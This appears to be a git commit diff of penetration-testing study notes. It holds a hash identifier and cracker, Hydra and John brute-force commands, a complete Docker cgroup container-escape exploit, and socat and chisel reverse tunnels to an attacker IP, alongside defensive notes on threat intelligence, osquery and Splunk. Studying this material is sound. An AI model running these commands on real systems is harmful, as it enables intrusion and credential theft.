if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109560")
def sha1strtolowerusernamepass(hash):
hs='79f575543061e158c2da3799f999eb7c95261f07'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("109580")
def Haval192(hash):
hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110040")
def Haval192HMAC(hash):
hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110080")
def Tiger192(hash):
hs='c086184486ec6388ff81ec9f235287270429b2253b248a70'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110020")
def Tiger192HMAC(hash):
hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("110060")
def MD5passsaltjoomla1(hash):
hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("112020")
def SHA1Django(hash):
hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0:
jerar.append("113020")
def Haval224(hash):
hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114040")
def Haval224HMAC(hash):
hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114080")
def SHA224(hash):
hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114020")
def SHA224HMAC(hash):
hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("114060")
def SHA256(hash):
hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115020")
def SHA256HMAC(hash):
hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115120")
def Haval256(hash):
hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115040")
def Haval256HMAC(hash):
hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115140")
def GOSTR341194(hash):
hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115060")
def RipeMD256(hash):
hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115080")
def RipeMD256HMAC(hash):
hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115160")
def SNEFRU256(hash):
hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115100")
def SNEFRU256HMAC(hash):
hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115180")
def SHA256md5pass(hash):
hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115200")
def SHA256sha1pass(hash):
hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("115220")
def MD5passsaltjoomla2(hash):
hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
jerar.append("116020")
def SAM(hash):
hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0:
jerar.append("116040")
def SHA256Django(hash):
hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0:
jerar.append("117020")
def RipeMD320(hash):
hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118020")
def RipeMD320HMAC(hash):
hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("118040")
def SHA384(hash):
hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119020")
def SHA384HMAC(hash):
hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("119040")
def SHA256s(hash):
hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
jerar.append("120020")
def SHA384Django(hash):
hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
jerar.append("121020")
def SHA512(hash):
hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122020")
def SHA512HMAC(hash):
hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122060")
def Whirlpool(hash):
hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122040")
def WhirlpoolHMAC(hash):
hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("122080")
print(logo)
try:
first = str(argv[1])
except:
first = None
while True:
try:
jerar=[]
print("-"*50)
if first:
h = first
else:
h = input(" HASH: ")
ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h)
if len(jerar)==0:
print("\n Not Found.")
elif len(jerar)>2:
jerar.sort()
print("\nPossible Hashs:")
print("[+] "+str(algorithms[jerar[0]]))
print("[+] "+str(algorithms[jerar[1]]))
print("\nLeast Possible Hashs:")
for a in range(int(len(jerar))-2):
print("[+] "+str(algorithms[jerar[a+2]]))
else:
jerar.sort()
print("\nPossible Hashs:")
for a in range(len(jerar)):
print("[+] "+str(algorithms[jerar[a]]))
first = None
except KeyboardInterrupt:
print("\n\n\tBye!")
exit()

20
hashes/hash_cracker.py Executable file
View File

@ -0,0 +1,20 @@
#!/usr/bin/env python
import hashlib
import pyfiglet
print(pyfiglet.figlet_format("md5 cracker"))
wordlist_location = str(input("Wordlist file location: "))
hash_input = str(input("Enter hash to be cracked: "))
with open(wordlist_location, 'rb') as _f:
for line in _f.readlines():
line = line.strip()
hash_ob = hashlib.sha256(line)
#hash_ob = hashlib.md5(line)
hashed_pass = hash_ob.hexdigest()
print(line)
if hashed_pass == hash_input:
print("Password found: " + line.decode())
exit(0)

2
hashes/password_cracking/hash.txt Normal file
View File

@ -0,0 +1,2 @@
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

1
hashes/password_cracking/hashcat Submodule

@ -0,0 +1 @@
Subproject commit 5e1d37c82e8f5fc3588c10d9920c07ae6a71a0ce

8
hashes/password_cracking/john.md Normal file
View File

@ -0,0 +1,8 @@
# John The Ripper
# Usage
* Example
```
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2
```

37
hydra.md Normal file
View File

@ -0,0 +1,37 @@
# Hydra usage
## Examples
* HTTP post form
```sh
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
```
* HTTP basic auth
```sh
hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
```
|Command|Description|
|-------|-----------|
|`hydra -P <wordlist> -v <ip> <protocol>`|Brute force against a protocol of your choice|
|`hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>`|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
|`hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>`|Attack a Windows Remote Desktop with a password list.|
|`hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|
## Parameter
|Option|Decription|
|------|----------|
|-l|Single username|
|-P|Indicates use the following wordlist|
|http-post-form|indicates the method|
|/login url|the login URL|
|:username|the form field where the username is entered|
|^USER^|tells Hydra to use the username from -l|
|password|the formfield where the password is entered|
|^PASS^|tells Hydra to use the wordlist from -P|
|Login|indicates to Hydra the login failed message|
|Login failed|is the login failure message that the form returns|
|F=incorrect|If this word appears on the page, login failed|
|-V| verbose|

1
misc/GitTools Submodule

@ -0,0 +1 @@
Subproject commit 9f1820d33e0051cdfc5572f8b24700bb2430f9df

3
misc/bash.md Normal file
View File

@ -0,0 +1,3 @@
# Shell Scripting
[Bash Cheatsheet](https://devhints.io/bash)

1
misc/docker_sec/dive Submodule

@ -0,0 +1 @@
Subproject commit c7d121b3d72aeaded26d5731819afaf49b686df6

117
misc/docker_sec/docker.md Normal file
View File

@ -0,0 +1,117 @@
# Docker Vulnerabilities
## Abusing Registry
* [Registry Doc](https://docs.docker.com/registry/spec/api/)
* Registry is a json API endpoint
* Private registry added in `/etc/docker/daemon.json`
* Can be found by nmap as a service
### Enumeration
* General query
```sh
curl http://test.com:5000/v2/_catalog`
```
* List tags
```sh
curl http://test.com:5000/v2/<REPO>/<APP>/tags/list
```
* `history` section of the json object contains commands executed at build phase. May contain sensitive data like passwords.
```sh
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
```
## Reversing Docker Images
* [Dive](https://github.com/wagoodman/dive)
```sh
dive <IMAGE-ID>
```
## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## RCE via Exposed Docker Daemon
* Users inside the `docker` group may open tcp socket through docker
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
* Confirming via `curl http://test.com:2375/version` on open docker port
* Execute commands on socket
```sh
docker -H tcp://test.com:2375 ps
docker -H tcp://test.com:2375 exec <container> <cmd>
```
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
## Escape Container via Exposed Docker Daemon
* Looking for exposed docker sockets
```sh
find / -name "*sock"
groups
```
* Mount the host volume and chroot to it, need alpine image
```sh
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
```
## Shared Namespaces
* Namespaces
* Cgroups
* OverlayFS
* Requires root inside the container
* Execute command
```sh
nsenter --target 1 --mount sh
```
## Misconfiguration
* Privileged container connect to the host directly, not through the docker engine
* Execution of bins on the host from libs inside the container is possible
```sh
capsh --print
```
* `man capabilities`
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
* Exploit
```sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## Dirty c0w
https://github.com/dirtycow/dirtycow.github.io
## runC
[CVE-2019-5736](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/)
## Securing a Container
* Least Privileges
* Seccomp
* Securing Registry via TLS
## Checking if you are inside a container
* Low process count
```sh
ps aux
```
* `.dockerenv` in `/`
```sh
cd / && ls -lah
```
* cgroups contain docker names
```sh
pwd /proc/1
cat cgroups
```

11
misc/gitTools.md Normal file
View File

@ -0,0 +1,11 @@
# GitTools
* extract commits from repo
```sh
./extractor.sh <repo_with_.git> <targetdir>
```
* List `commit-meta.txt` files from all commits
```sh
separator="======================================="; for i in $(ls); do printf "\n\n$separator\n\033[4;1m$i\033[0m\n$(cat $i/commit-meta.txt)\n"; done; printf "\n\n$separator\n\n\n"
```
* Compare hashes of the commits. The one without a parent is the oldest one.

47
misc/threat_intelligence/isac.md Normal file
View File

@ -0,0 +1,47 @@
# Threat Intelligence
Data must be analyzed to be considered threat intelligence. Once analyzed and actionable, then it becomes threat intelligence. The data needs context around to become intel.
__Cyber Thread Intelligence (CTI)__ is a precautionary measure that companies use or contribute to so that other corporations do not get hit with the same attacks. Of course, adversaries change their TTPs all the time so the TI landscape is constantly changing.
Vendors and corporations will sometimes share their collected CTI in what are called __ISACs__ or __Information Sharing and Analysis Centers__. __ISACs__ collect various indicators of an adversary that other corporations can use as a precaution against adversaries.
Threat Intelligence is also broken up into three different types.
* Strategic
* Assist senior management make informed decisions specifically about the security budget and strategies.
* Tactical
* Interacts with the TTPs and attack models to identify adversary attack patterns.
* Operational
* Interact with IOCs and how the adversaries operationalize.
## Advance Persistent Threats (APTs)
* https://www.fireeye.com/current-threats/apt-groups.html
## TTP
TTP is an acronym for Tactics, Techniques, and Procedures, but what does each of these terms mean?
* The __Tactic__ is the adversary's goal or objective.
* The __Technique__ is how the adversary achieves the goal or objective.
* The __Procedure__ is how the technique is executed.
TI is an acronym for Threat Intelligence. Threat Intelligence is an overarching term for all collected information on adversaries and TTPs. You will also commonly hear CTI or Cyber Threat Intelligence which is just another way of saying Threat Intelligence.
## Indicator of Compromise
* __IOCs__ is an acronym for __Indicators of Compromise__, the indicators for malware and adversary groups. Indicators can include file hashes, IPs, names, etc.
## Information Sharing and Analysis Centers (ISACs)
According to the National Council of __ISACs__, "Information Sharing and Analysis Centers (ISACs) are member-driven organizations, delivering all-hazards threat and mitigation information to asset owners and operators". ISACs can be community-centered or vendor-specific. ISACs include CTI from threat actors as well as mitigation information in the form of IOCs, YARA rules, etc. ISACs maintain situational awareness by sharing and collaborating to maintain CTI, through a National Council of ISACs.
* ISACs
* [US-CERT](https://us-cert.cisa.gov/)
* [AlienVault OTX](https://otx.alienvault.com/)
* [ThreatConnect](https://threatconnect.com/)
* [MISP](https://www.misp-project.org/)

65
misc/threat_intelligence/osquery.md Normal file
View File

@ -0,0 +1,65 @@
# Osquery
* [Documentation](https://osquery.readthedocs.io/en/stable/)
* [Schema Docs](https://osquery.io/schema/4.7.0/)
## Usage
* `.help` is the overiew
### List available tables
```sh
.tables
```
* Specify via `.tables <tablename>`
### Show schema
```sh
.schema <table_name>
```
* Show schema for foreign operating systems via `--enable_foreign`
### Queries
* Select
```sql
select * from <table>;
select * <attr>,<attr> from <table>;
```
* UPDATE and DELETE is possible on run-time tables
* JOIN
```sql
SELECT pid, name, path FROM osquery_info JOIN processes USING (pid);
```
* Where clause operators
* `=` [equal]
* `<>` [not equal]
* `>, >=` [greater than, greater than or equal to]
* `<, <=` [less than or less than or equal to]
* `BETWEEN` [between a range]
* `LIKE` [pattern wildcard searches]
* `%` [wildcard, multiple characters]
* `_` [wildcard, one character]
* Matching wildcard rules
* `%`: Match all files and folders for one level.
* `%%`: Match all files and folders recursively.
* `%abc`: Match all within-level ending in "abc".
* `abc%`: Match all within-level starting with "abc".
## Remote Queries via Frontend
* [Repo](https://github.com/fleetdm/fleet.git)
## Extensions
* [osquery-extensions](https://github.com/trailofbits/osquery-extensions)
* [osq-ext-bin](https://github.com/polylogyx/osq-ext-bin)
### Yara
```sql
select * from yara where sigfile='<sigfile>' and path like '/home/%%';
```
* [Docs](https://osquery.readthedocs.io/en/stable/deployment/yara/)

18
misc/threat_intelligence/siem.md Normal file
View File

@ -0,0 +1,18 @@
# Security Information and Event Management (SIEM)
* [Varonis](https://www.varonis.com/blog/what-is-siem/)
* Threat detection
* Investigation
* Time to respond
* Some other SIEM features:
* Basic security monitoring
* Advanced threat detection
* Forensics & incident response
* Log collection
* Normalization
* Notifications and alerts
* Security incident detection
* Threat response workflow

63
misc/threat_intelligence/splunk.md Normal file
View File

@ -0,0 +1,63 @@
# Splunk
## Splunk Bar
* Messages
* Settings
* Activity
* Help
* Find
## Search & Reporting
* Tip: If you want to land into the Search app upon login automatically, you can do so by editing the user-prefs.conf file.
```sh
C:\Program Files\Splunk\etc\apps\user-prefs\default\user-prefs.conf
/opt/splunk/etc/apps/user-pref/default/user-prefs.conf
```
* [Docs](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Aboutthesearchapp)
* [Start searching](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Startsearching)
* [Time range picker](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Aboutthetimerangepicker)
* [Field to search](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Usefieldstosearch)
* [Use field lookups](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Usefieldlookups)
* [Search field lookups](https://docs.splunk.com/Documentation/Splunk/8.1.2/SearchTutorial/Searchwithfieldlookups)
* [Splunk Regex](https://docs.splunk.com/Documentation/Splunk/8.1.2/Knowledge/AboutSplunkregularexpressions)
* Tabs
* Event
* Patterns
* Statistics
* Visualization
## Adding Data
* [Adding Data Docs](https://docs.splunk.com/Documentation/Splunk/8.1.2/Data/Getstartedwithgettingdatain#Use_apps_to_get_data_in)
* `Settings > Data > Data Inputs` contains further sources
* Add data after that via `Add Data`
## Queries
* [Metadata](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Metadata)
* [Metalore](https://www.splunk.com/blog/2017/07/31/metadata-metalore.html)
```sh
| metadata type=sourcetypes index=botsv2 | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") | eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S") | sort - totalCount
```
* Examples
* Filtering HTTP sites visited for found IP
```sh
index="botsv2" 10.0.2.101 sourcetype="stream:HTTP" | dedup site | table site
```
## Sigma
* [Sigma Repo](https://github.com/Neo23x0/sigma)
* [TA-Sigma-Searches](https://github.com/dstaulcu/TA-Sigma-Searches)
* [Conversion](https://uncoder.io/)
* E.g. : `sigma: APT29` as input
## Dashboard
```sh
source="<source>" | top limit=5 EventID
```
* Visualization > choose Chart > "Save As" (top right) > DashboardName
## Alerting
* [Workflow](https://docs.splunk.com/Documentation/SplunkCloud/8.1.2012/Alert/AlertWorkflowOverview)

1
nishang Submodule

@ -0,0 +1 @@
Subproject commit 0090ba2e51b7503c3245081894c0fc87b696f941

42
pentesting.md Normal file
View File

@ -0,0 +1,42 @@
# Methodology
* Steps
* Reconnaissance
* Enumeration/Scanning
* Gaining Access
* Privilege Escalation
* Covering Tracks
* Reporting
## Reconnaissance
* Duck / SearX / metacrawler / google
* Wikipedia
* [Shodan.io](http://www.shodan.io)
* PeopleFinder.com
* who.is
* sublist3r
* hunter.io
* builtwith.com
* wappalyzer
## Enumeration
* nmap
* nikto
* gobuster
* dirbuster
* metasploit
* enum4linux / linpeas / winpeas / linenum
## Exploitation
## Privilege Escalation
## Covering Tracks
## Reporting
* Includes
* Vulnerabilities
* Criticality
* Description
* Countermeasures
* Finding summary

144
pivoting.md Normal file
View File

@ -0,0 +1,144 @@
# Pivoting
* Tunnelling/Proxying
* Port Forwarding
## Enumeration
### Using material found on the machine and preinstalled tools
* `arp -a`
* `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts`
* `/etc/resolv.conf`
* `ipconfig /all`
* `nmcli dev show`
### Statically compiled tools](https://github.com/andrew-d/static-binaries.git)
### Scripting Techniques
```sh
for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
```
* Using local tools through a proxy like `nmap`
## Tools
### Enumerating a network using native and statically compiled tools
### Proxychains / FoxyProxy
* Proxychains
```sh
proxychains nc <IP> <PORT>
```
* Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
```
[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks4 127.0.0.1 9050
# proxy_dns
```
* FoxyProxy
### SSH port forwarding and tunnelling (primarily Unix)
* LocalPortForwarding
```sh
ssh -L <LocalPort>:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
```
* Dynamic Port Forwarding
```sh
ssh -D <Port> <user>@<Jumpserver> -fN
```
* Reverse Proxy
```sh
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP(local) -i KEYFILE -fN
```
### plink.exe (Windows)
* [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
```sh
cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
```
* Key generation
```sh
puttygen <keyfile> -o key.ppk
```
### Socat
* Reverse shell on target via
```sh
./socat tcp-l:8000 tcp:<attacker-IP>:443 &
```
* Attacking bind shell
```sh
sudo nc -lvnp 443
```
* Relay via Jumpserver
```sh
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
```
* Quiet Port Forwarding
* On attacker
```sh
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
```
* On relay server
```sh
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
```
* Open `localhost:8000`
* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.
### Chisel
* **Does not require SSH on target**
* Reverse Proxy
* Bind port on attacker
```sh
./chisel server -p <ListeningPort> --reverse &
```
* Reverse port on target/proxy
```sh
./chisel client <attacker-IP>:<attacker-Port> R:socks &
```
* `proxychains.conf` contains
```sh
[ProxyList]
socks5 127.0.0.1 <Listening-Port>
```
* Forward SOCKS Proxy
* Proxy/compromised machine
```sh
./chisel server -p <Listen-Port> --socks5
```
* On attacker
```sh
./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
```
* Remote Port Forward
* On attacker
```sh
./chisel server -p <Listen-Port> --reverse &
```
* On forwarder
```sh
./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
```
* Local Port Forwarding
* On proxy
```sh
./chisel server -p <Listen-Port>
```
* On attacker
```sh
./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
```
### sshuttle
* `pip install sshuttle`
* `sshuttle -r <user>@<target> <subnet/CIDR>`
* or automatically determined
```sh
sshuttle -r <user>@<target> -N
```
* Key based auth
```sh
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
```
* Exclude servers via `-x`, for example the target/gateway server

1
post_exploitation/bc_security/Empire Submodule

@ -0,0 +1 @@
Subproject commit ce332b5b08d7249c21e121697b7b48d6414c2a18

1
post_exploitation/bc_security/Starkiller Submodule

@ -0,0 +1 @@
Subproject commit 0dc0ff255a4bb07d2c2664ef6220137f7e40bb75

4
post_exploitation/docs/c2.md Normal file
View File

@ -0,0 +1,4 @@
# Command and Control
* [Matrix](https://www.thec2matrix.com/)
* [bcsecurity](https://www.bc-security.org/) maintains Empire 4

Some files were not shown because too many files have changed in this diff Show More